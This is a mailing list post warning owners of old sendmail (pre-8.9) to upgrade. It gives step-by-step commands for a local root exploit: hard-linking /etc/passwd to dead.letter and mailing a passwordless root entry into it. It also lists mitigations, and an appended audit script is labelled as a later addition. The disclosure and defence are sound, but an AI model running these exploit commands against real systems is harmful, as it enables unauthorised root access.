
[LI] root access from old sendmail boxes



Hi

To those of you with old sendmail boxes (pre 8.9), here's something which
should send chills down your spine.  Upgrade to 8.9.3 ASAP.

From http://www.rootshells.com:

Try this:

Make hard link of /etc/passwd to /var/tmp/dead.letter

Telnet to port 25, send mail from some bad email address to some
unreachable host.

Watch your message get appended to passwd, i.e.:

cowzilla::0:0:c0wz1ll4 0wns u:/:/bin/sh

This is not good.  Worked with my 8.8.4, will probably also work with
8.8.5.

Root for the whole family

==================================================================

Okay, just want to point out some things about this exploit... This won't
work on big boxes that are partitioned, because you can only make a hard link
on the same file system.  Another point is that any box that has a
'MAILER-DAEMON' defined will get any mail that gets sent there instead of
saving it to /var/tmp/dead.letter, i.e., make an /etc/aliases file that
defines a MAILER-DAEMON. For instance, I add these two to my /etc/aliases:

MAILER-DAEMON:gonzo
postmaster:gonzo

Then you just type 'newaliases' and you're good to go. (postmaster is a
generally good idea.) Of course, then you have to deal with people's messed up
mail...


===================================================================

Here's a nice little sendmail exploit that works with 8.8.4 and maybe with
8.8.5. You need to have an account on the system you're exploiting. Telnet
to your shell and issue the following commands:

ln /etc/passwd /var/tmp/dead.letter
telnet target.host 25
mail from: non@xxxxxxxxxxxxx
rcpt to: non@xxxxxxxxxxxxx
data
kRad::0:0:J0oR dEaD:/root:/bin/bash
.
quit

The body of the message will be written into /etc/passwd and you've got a
password-free root account.

Note that this will NOT work under any of the following circumstances:

1. /var and / are different partitions.
        You can't make a hardlink between different partitions.

2. There is a postmaster account or mail alias.
        Mail problems are sent to postmaster before they go to
        /var/tmp/dead.letter.

3. /var/tmp doesn't exist or isn't publicly writable.
        Duh.

4. Other situations?


-- 
Suresh Ramasubramanian     | President, CAUCE India
r.suresh@xxxxxxxxxxxxxxx   | suresh@xxxxxxxxxxxxxxx
http://www.india.cauce.org | Stopping Spam In India

--
Real programmers don't write in BASIC.  Actually, no programmers write in
BASIC after reaching puberty.
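The three preconditions listed above (shared filesystem, world-writable /var/tmp, no MAILER-DAEMON/postmaster alias) can be checked from the admin side, and a passwd file that has quietly gained a second hard link is the tell-tale sign that the trick has already been used. The following audit helper is an added example, not from the post or from rootshell; the function names and the default paths it takes as arguments are my own choices.

```shell
#!/bin/sh
# Constructed audit helper for the dead.letter hard-link problem described
# in the post. Uses only POSIX tools (df -P, ls, grep, awk) so it runs on
# old and new systems alike.

# Succeeds if both paths sit on the same mounted filesystem, which is the
# only case in which a hard link between them can be created at all.
same_filesystem() {
    m1=$(df -P "$1" | awk 'NR==2 {print $NF}')
    m2=$(df -P "$2" | awk 'NR==2 {print $NF}')
    [ -n "$m1" ] && [ "$m1" = "$m2" ]
}

# Succeeds if the directory exists and the "other" write bit is set
# (character 9 of the ls mode string); the sticky bit does not matter here.
world_writable_dir() {
    [ -d "$1" ] || return 1
    [ "$(ls -ld "$1" | cut -c9)" = "w" ]
}

# Succeeds if the aliases file maps both MAILER-DAEMON and postmaster to a
# real recipient, so bounces are delivered instead of dumped in dead.letter.
aliases_cover() {
    grep -Eiq '^[[:space:]]*MAILER-DAEMON[[:space:]]*:[[:space:]]*[^[:space:]#]' "$1" &&
    grep -Eiq '^[[:space:]]*postmaster[[:space:]]*:[[:space:]]*[^[:space:]#]' "$1"
}

# Prints the hard-link count (second field of ls -ld). A value above 1 for
# /etc/passwd means some other directory entry names the same inode.
link_count() {
    ls -ld "$1" | awk '{print $2}'
}

# Runs all checks; returns 1 if any precondition holds or a stray link exists.
audit_host() {
    passwd=${1:-/etc/passwd}; tmp=${2:-/var/tmp}; aliases=${3:-/etc/aliases}
    rc=0
    if same_filesystem "$passwd" "$tmp" && world_writable_dir "$tmp"; then
        echo "WARN: $tmp is world-writable and shares a filesystem with $passwd"; rc=1
    fi
    aliases_cover "$aliases" || { echo "WARN: MAILER-DAEMON/postmaster not aliased in $aliases"; rc=1; }
    if [ "$(link_count "$passwd")" -gt 1 ]; then
        echo "ALERT: $passwd has extra hard links (look for $tmp/dead.letter)"; rc=1
    fi
    return $rc
}
```

On Linux 3.6 and later, the sysctl fs.protected_hardlinks=1 stops unprivileged users from hard-linking files they do not own, which removes the first precondition regardless of how the disk is partitioned.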

--------------------------------------------------------------------
The Linux India Mailing List Archives are now available.  Please search
the archive at http://lists.linux-india.org/ before posting your question
to avoid repetition and save bandwidth.